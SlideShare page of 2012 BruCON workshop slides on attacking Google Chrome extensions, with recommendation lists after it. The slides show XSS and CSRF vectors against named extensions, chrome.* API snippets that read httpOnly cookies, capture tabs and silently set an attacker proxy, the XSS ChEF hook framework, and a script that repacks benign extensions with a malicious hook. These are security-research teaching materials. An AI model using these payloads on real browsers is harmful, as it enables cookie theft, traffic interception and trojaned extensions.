SlideShare une entreprise Scribd logo

Advanced Chrome extension exploitation

Krzysztof Kotowicz
Krzysztof Kotowicz

Slides from BruCON 2012 workshops "Advanced Chrome Extension exploitation" by Kyle Osborn and Krzysztof Kotowicz

Technologie
1  sur  57
Télécharger pour lire hors ligne
Advanced   Chrome  Extension  Exploita5on Kyle  ‘Kos’  Osborn Krzysztof  Kotowicz 1
Introduc5on • Krzysztof  Kotowicz – IT  security  consultant  at  SecuRing – h<p://blog.kotowicz.net – @kkotowicz   • Kyle  Osborn – Pentester  at  AppSec  ConsulFng – h<p://kyleosborn.com/ – @theKos 2
Previous  research • Kyle  Osborn,  Ma<  Johansen – Hacking  Google  ChromeOS  (BH  2011) • N.  Carlini,  A.  Porter  Felt,  D.  Wagner  -­‐  UC  Berkeley – An  EvaluaFon  of  the  Google  Chrome  Extension  Security   Architecture h<p://www.eecs.berkeley.edu/~afelt/ extensionvulnerabiliFes.pdf • Krzysztof  Kotowicz – h<p://blog.kotowicz.net/2012/02/intro-­‐to-­‐chrome-­‐addons-­‐ hacking.html 3
Plan • Briefing – Chrome  extensions  security  101 – Abusing  Chrome  extensions – Easy  exploitaFon – Using  XSS  ChEF • Workshops – all  of  the  above  in  pracFce  &  more – h<p://kotowicz.net/brucon/ 4
CHROME  EXTENSIONS  SECURITY 5
Chrome  extensions  security • Extensions  are  HTML5  applicaFons  packaged  in  signed  .crx   files • chrome-­‐extension://<id>  URLs • Have  access  to  powerful  API – chrome.tabs – chrome.history – chrome.cookies – chrome.proxy – bundled  plugins  (NPAPI) • Permissions  defined  in  manifest.json 6
Chrome  extensions  security • Extensions  have  a  lot  of  power  to  abuse • How  bad  can  it  be?  Think... – global  XSS – idenFty  thec  (bookmarks,  history,  cookies) – filesystem  access – remote  code  execuFon  (meterpreter) 7
Chrome  extensions  security Content  script • Can  interact  with  webpage  DOM – e.g.  execute  Javascript – isolated  worlds  for  page  JS  /  content  script  JS • No  access  to  chrome.*  API 8
Chrome  extensions  security View  pages • Have  access  to  chrome.*  API • No  access  to  webpage  DOM • Content  scripts  and  view  pages  can  only   exchange  messages • Examples: – opFon  pages – new  tabs – popups 9
Chrome  extensions  security Background  page • View  page  that  runs  constantly • Has  access  to  chrome.*  API • The  UlPmate  Target 10
Chrome  extensions  security • Currently,  Chrome  extension  security  is  very   reliant  on  the  developer – WriFng  bad  code  is  easy – Giving  extensions  more  permissions  than   necessary  is  easier • Extensions  suffer  from  common  web   vulnerabili5es 11
Chrome  extensions  security • XSS:    page  DOM  has  a  vector  that  is  grabbed   and  executed  by  extension   <link  rel="alternate"  type="application/rss+xml"   title="hello  <img  src=x  onerror='alert(1)'>"   href="/rss.rss"> • CSRF:  Page  directly  requests  extension  URLs <iframe  src="chrome-­‐extension://<id>/pages/ subscribe.html?location=//evil/whitelist"></iframe> 12
Chrome  extensions  security • NPAPI  plugins  vulns – Extensions  can  use  NPAPI  plugins  (.dll,  .so  etc.) – Those  run  outside  of  Chrome  sandboxes – Full  permissions  of  current  OS  user – Possible  vulns:  RCE,  buffer  overflows,  path   disclosures,  command  injecFons,  ... • Manual  review  by  Google  if  plugin  is  used 13
Chrome  extensions  security • Content-­‐Security-­‐Policy  prevents  XSS • Chrome  supports  CSP  in  the  webpages X-Content-Security-Policy, X-WebKit-CSP • Chrome  supports  CSP  in  extensions content_security_policy  in  manifest • But... 14
Extensions  vs  CSP  in  webpage • Total  CSP  bypass – You  can  inject  any  code  via  extension   chrome.tabs.executeScript(null, {code:“alert(1)”}) – Injected  code: • is  same  origin  with  the  page  (document.cookie  etc.) • can  communicate  with  view  pages   (chrome.extension.sendMessage) 15
Extensions  vs  CSP  in  manifest • Cannot  execute  arbitrary  code • Even  CSP  in  extension  +  CSP  in  webpage  does   not  make  you  100%  safe! – You  can  pivot  the  a<ack  through  webpage – You  need  addiFonal  vulnerabiliFes  to  exploit  this 16
Chrome  extensions  security • Most  commonly  vulnerable – RSS  readers – Note  extensions – Web  Developer  extensions 17
Chrome  extensions  security manifest.json • Defines  resources,  permissions,  name  etc. • v1 – insecure,  but  everyone  uses  it • v2 – Secure  Content-­‐Security-­‐Policy  by  default  (no  XSS!) – Pages  cannot  access  extension  URLs  (no  CSRF!) – Unpopular • 26  out  of  top  1000  extensions – Will  be  enforced  in  Q3  2013 18
Chrome  extensions  security Installa5on  Methods • Chrome  Web  Store – curated  by  Google • .crx  install  from  any  website  (prompts  user) – Chrome  21  makes  off-­‐store  installs  harder • Drag  &  drop  .crx  to  chrome://extensions • Or  use  --enable-easy-off-store-extension-install  flag • MiTM  not  possible  due  to  cerFficate  signing 19
ABUSING  CHROME  EXTENSIONS 20
Fingerprin5ng • The  simplest  method – Generate  a  list  of  known  extension  IDs,  and   bruteforce  chrome-­‐extension://ID/  resources  to   discovered  extensions – use  onerror/onload  to  check  for  existence • hZp://blog.kotowicz.net/2012/02/intro-­‐to-­‐ chrome-­‐addons-­‐hacking.html 21
CSRF  -­‐  example • Chrome  Adblock  2.5.22 – Extension  UI  uses  pages/subscribe.html   – pages/subscribe.html?locaFon=url  will  subscribe   to  new  block  list var queryparts = parseUri.parseSearch(document.location.search);   BGcall("subscribe",       {id: 'url:' + queryparts.location}); • Can  be  called  by  any  webpage <iframe src="chrome-extension://<id>/pages/ subscribe.html?location=//evil/whitelist"> 22
XSS  -­‐  example • Slick  RSS  +  Slick  RSS:  Feed  Finder – simple  injecFon  locaFon  (<link>  tag  Ftle) <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss"> 23
Leveraging  XSS • Vector  in  page  =>  XSS  in  content  script – No  access  to  chrome.*  API – Only  chrome.extension.* • e.g.  chrome.extension.connect  &   chrome.extension.sendMessage  to  communicate – Need  to  elevate  to  view  script • From  view  script chrome.extension .getBackgroundPage() .eval(”mwahahahahaaaaa!”) 24
XSS  -­‐  example 25
NPAPI  vulns  -­‐  example • CR-­‐GPG  0.7.8    (gpg-­‐gmail  bridge) • GPG  in  gmail??? 26
NPAPI  vulns  -­‐  example • Uses  external  gpg  install  through  NPAPI  plugin • Long  story  short: – Easy  to  get  from  this: 27
NPAPI  vulns  -­‐  example • To  this: 28
NPAPI  vulns  -­‐  example • To  this: 29
NPAPI  vulns  -­‐  example • To  this: 30
EASY  EXPLOITATION 31
Easy  exploita5on • alert(1)  -­‐  Now  what? • Use  an  automated  tool  to  pillage  and  plunder • BeEF  does  a  great  job  hooking  into DOMs • But  –  Need  a  special  tool  designed  to  take   advantage  of  Chrome  extension  APIs 32
Easy  exploita5on • Enter  XSS  ChEF (Chrome  Extension  Exploita2on  Framework) – Designed  from  the  ground  up  for   exploiFng  extensions – Fast  (uses  WebSockets) – Preloaded  with  automated a<ack  scripts 33
Easy  exploita5on • Monitor  open  tabs  of  vicPms • Execute  JS  on  every  tab • Extract  HTML • Read/write  cookies • Access  localStorage • Manipulate  browser  history • Take  screenshots  of  tabs • Inject  BeEF  hooks  /  keyloggers 34
USING  XSS  CHEF 35
XSS  ChEF Launching  server $ php -v PHP 5.3.12 (cli) (built: Jun 7 2012 22:49:42) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans $ php server.php 2>command.log XSS ChEF server by Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: php server.php [port=8080] [host=127.0.0.1] Communication is logged to stderr, use php server.php [port] 2>log.txt 2012-07-22 12:40:06 [info] Server created 2012-07-22 12:40:06 ChEF server is listening on 127.0.0.1:8080 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Connected 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Performing handshake 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Handshake sent 2012-07-22 12:40:06 New hook c3590977550 from 127.0.0.1 ... 36
XSS  ChEF Console 37
XSS  ChEF Hook  code 38
XSS  ChEF 39
XSS  ChEF 40
XSS  ChEF 41
API  abuse • chrome.tabs.query  -­‐  gets  access  to  all  tabs   URLs  (even  incognito!),  Ptles,  documents  etc. chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t}); }); 42
API  abuse • chrome.tabs.executeScript  -­‐  global  XSS  on  any   tab • bypasses  CSP chrome.tabs.executeScript(null, { code:"alert(document.cookie)" }); 43
API  abuse • chrome.tabs.captureVisibleTab chrome.tabs.captureVisibleTab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url}); }); 44
API  abuse • chrome.cookies – read/write  cookies,  even  h<pOnly chrome.cookies.getAll({url: chrome.cookies.set({ "https://www.google.com/"}, cb); url: 'https://www.google.com/', name: 'test-chef', value: 'test-ok', {"domain": ".google.com", secure: true, "expirationDate": 1358717774.49, httpOnly: true, "hostOnly": false, expirationDate: null, "httpOnly": true, path: '/' "name": "NID", }, cb); "path": "/", "secure": false, "session": false, "storeId": "0", "value": "61=...." },... 45
API  abuse • chrome.proxy  -­‐  silently  change  HTTP  proxy! var evilProxy = { "mode": "fixed_servers", "rules": { "bypassList": ["<local>","ATTACKER_DOMAIN.COM"], // EXCLUDE BACK CHANNEL FROM PROXY "singleProxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } } } chrome.proxy.settings.set({value: evilProxy, scope: 'regular'}, cb); 46
API  abuse • chrome.bookmarks  -­‐  interact  with  bookmarks chrome.bookmarks.search("http", cb); {"dateAdded": 1342946320, "id": "123", "index": 0, "parentId": "21", "title": "GMail", "url": "https://mail.google.com/"} 47
Pre-­‐Workshop  Info • Requirements – Latest  version  of  XSS  ChEF  required  (w/  dependencies) • PHP  5.3  +  HTTP  server,  opFonally  node.js • unzip,  curl   • Only  heavily  tested  under  OS  X  &  Linux – Chrome – Selected  extensions • All  links  can  be  found  on hdp://kotowicz.net/brucon 48
BREAK  (THEN  WORKSHOP) hdp://kotowicz.net/brucon 49
Workshop • Part  one:  ExploitaPon – Discovery – AutomaFon • Part  two:  Repacking – Leveraging  the  human  factor 50
Part  one:  Exploita5on • Slick  RSS • Slick  RSS:  Feed  Finder 51
Part  one:  Exploita5on • Web  Developer 52
Part  one:  Exploita5on • Springpad  Extension 53
Part  one:  Exploita5on • Cookie  Manager 54
Part  one:  Exploita5on • cr-­‐gpg 55
Part  Two:  Repacking • Wanted  to  get  MORE  privileges • UPlizes  “click-­‐through-­‐syndrome” • You  can  repack  any  other  benign  extension,   adding  malicious  part  (e.g.  XSS  chef  hook) 56
Part  Two:  Repacking $ ./repacker-webstore.sh <ID> output.crx Unpacking ... Injecting xsschef... Adding permissions... Saving... Done. Moving signed extension to output.crx 57

Recommandé

Linux Kernel Exploitation
Linux Kernel ExploitationLinux Kernel Exploitation
Linux Kernel ExploitationScio Security
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Hangman
HangmanHangman
Hangmanpattaranattamon
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...
CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...
CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...CODE BLUE
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
Angelo Compagnucci - Upgrading buildroot based devices with swupdate
Angelo Compagnucci - Upgrading buildroot based devices with swupdateAngelo Compagnucci - Upgrading buildroot based devices with swupdate
Angelo Compagnucci - Upgrading buildroot based devices with swupdatelinuxlab_conf
 

Recommandé

Linux Kernel Exploitation
Linux Kernel ExploitationLinux Kernel Exploitation
Linux Kernel ExploitationScio Security
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Hangman
HangmanHangman
Hangmanpattaranattamon
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...
CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...
CODE BLUE 2014 : A security assessment study and trial of Tricore-powered aut...CODE BLUE
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
Angelo Compagnucci - Upgrading buildroot based devices with swupdate
Angelo Compagnucci - Upgrading buildroot based devices with swupdateAngelo Compagnucci - Upgrading buildroot based devices with swupdate
Angelo Compagnucci - Upgrading buildroot based devices with swupdatelinuxlab_conf
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzingn|u - The Open Security Community
 
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...Anne Nicolas
 
JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013Vladimir Ivanov
 
iOSにおける自動テストの並列化
iOSにおける自動テストの並列化iOSにおける自動テストの並列化
iOSにおける自動テストの並列化Toshiyuki Hirata
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Memory access tracing [poug17]
Memory access tracing [poug17]Memory access tracing [poug17]
Memory access tracing [poug17]Mahmoud Hatem
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesCharles Nutter
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cvim half precision floating point
Cvim half precision floating pointCvim half precision floating point
Cvim half precision floating pointtomoaki0705
 
Understanding of linux kernel memory model
Understanding of linux kernel memory modelUnderstanding of linux kernel memory model
Understanding of linux kernel memory modelSeongJae Park
 
IPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesIPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesMartin Děcký
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Jian-Hong Pan
 
Android 逆向工程心得分享
Android 逆向工程心得分享Android 逆向工程心得分享
Android 逆向工程心得分享EnPing Eric Hsieh
 
Présentation html5
Présentation html5Présentation html5
Présentation html5Kénium
 
Regular Expression Injection
Regular Expression InjectionRegular Expression Injection
Regular Expression InjectionNSConclave
 
用Raspberry PI學Linux驅動程式
用Raspberry PI學Linux驅動程式用Raspberry PI學Linux驅動程式
用Raspberry PI學Linux驅動程式Stanley Ho
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......hugo lu
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 

Contenu connexe

Tendances

Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...Anne Nicolas
 
JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013Vladimir Ivanov
 
iOSにおける自動テストの並列化
iOSにおける自動テストの並列化iOSにおける自動テストの並列化
iOSにおける自動テストの並列化Toshiyuki Hirata
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Memory access tracing [poug17]
Memory access tracing [poug17]Memory access tracing [poug17]
Memory access tracing [poug17]Mahmoud Hatem
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesCharles Nutter
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cvim half precision floating point
Cvim half precision floating pointCvim half precision floating point
Cvim half precision floating pointtomoaki0705
 
Understanding of linux kernel memory model
Understanding of linux kernel memory modelUnderstanding of linux kernel memory model
Understanding of linux kernel memory modelSeongJae Park
 
IPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesIPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesMartin Děcký
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Jian-Hong Pan
 
Android 逆向工程心得分享
Android 逆向工程心得分享Android 逆向工程心得分享
Android 逆向工程心得分享EnPing Eric Hsieh
 
Présentation html5
Présentation html5Présentation html5
Présentation html5Kénium
 
Regular Expression Injection
Regular Expression InjectionRegular Expression Injection
Regular Expression InjectionNSConclave
 
用Raspberry PI學Linux驅動程式
用Raspberry PI學Linux驅動程式用Raspberry PI學Linux驅動程式
用Raspberry PI學Linux驅動程式Stanley Ho
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......hugo lu
 

Tendances (20)

Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
 
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
 
JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013JVM JIT-compiler overview @ JavaOne Moscow 2013
JVM JIT-compiler overview @ JavaOne Moscow 2013
 
iOSにおける自動テストの並列化
iOSにおける自動テストの並列化iOSにおける自動テストの並列化
iOSにおける自動テストの並列化
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratch
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Memory access tracing [poug17]
Memory access tracing [poug17]Memory access tracing [poug17]
Memory access tracing [poug17]
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for Dummies
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editor
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Cvim half precision floating point
Cvim half precision floating pointCvim half precision floating point
Cvim half precision floating point
 
Understanding of linux kernel memory model
Understanding of linux kernel memory modelUnderstanding of linux kernel memory model
Understanding of linux kernel memory model
 
IPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, CapabilitiesIPC in Microkernel Systems, Capabilities
IPC in Microkernel Systems, Capabilities
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021
 
Android 逆向工程心得分享
Android 逆向工程心得分享Android 逆向工程心得分享
Android 逆向工程心得分享
 
Présentation html5
Présentation html5Présentation html5
Présentation html5
 
Regular Expression Injection
Regular Expression InjectionRegular Expression Injection
Regular Expression Injection
 
用Raspberry PI學Linux驅動程式
用Raspberry PI學Linux驅動程式用Raspberry PI學Linux驅動程式
用Raspberry PI學Linux驅動程式
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......
 

En vedette

When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XMichele Orru
 
OVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source TreeOVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source TreeChang W. Doh
 
Android chromium web view
Android chromium web viewAndroid chromium web view
Android chromium web view朋 王
 
Chrome & Webkit overview
Chrome & Webkit overviewChrome & Webkit overview
Chrome & Webkit overviewBin Chen
 
Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents Ipsos France
 
Google Chrome Extensions
Google Chrome ExtensionsGoogle Chrome Extensions
Google Chrome ExtensionsSamantha Morra
 
Field Joint of Cement lined Pipe
Field Joint of Cement lined PipeField Joint of Cement lined Pipe
Field Joint of Cement lined PipeJohnson Prabu
 
Chromium ui framework(shared)
Chromium ui framework(shared)Chromium ui framework(shared)
Chromium ui framework(shared)gnomekr
 
Shell structure (basic concept)
Shell structure (basic concept)Shell structure (basic concept)
Shell structure (basic concept)Ian Toisa
 
Mobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalMobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalAleyda Solís
 
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)Board of Innovation
 
The Seven Deadly Social Media Sins
The Seven Deadly Social Media SinsThe Seven Deadly Social Media Sins
The Seven Deadly Social Media SinsXPLAIN
 

En vedette (20)

When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
 
OVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source TreeOVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source Tree
 
Android chromium web view
Android chromium web viewAndroid chromium web view
Android chromium web view
 
Chrome & Webkit overview
Chrome & Webkit overviewChrome & Webkit overview
Chrome & Webkit overview
 
Piping materials v imp
Piping materials v impPiping materials v imp
Piping materials v imp
 
Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents
 
Google Chrome Extensions
Google Chrome ExtensionsGoogle Chrome Extensions
Google Chrome Extensions
 
Field Joint of Cement lined Pipe
Field Joint of Cement lined PipeField Joint of Cement lined Pipe
Field Joint of Cement lined Pipe
 
Organic Architecture
Organic ArchitectureOrganic Architecture
Organic Architecture
 
Chromium ui framework(shared)
Chromium ui framework(shared)Chromium ui framework(shared)
Chromium ui framework(shared)
 
Roof
RoofRoof
Roof
 
Shell structure (basic concept)
Shell structure (basic concept)Shell structure (basic concept)
Shell structure (basic concept)
 
Mobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalMobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigital
 
The Minimum Loveable Product
The Minimum Loveable ProductThe Minimum Loveable Product
The Minimum Loveable Product
 
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
 
The Seven Deadly Social Media Sins
The Seven Deadly Social Media SinsThe Seven Deadly Social Media Sins
The Seven Deadly Social Media Sins
 

Similaire à Advanced Chrome extension exploitation

Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headersAndre N. Klingsheim
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
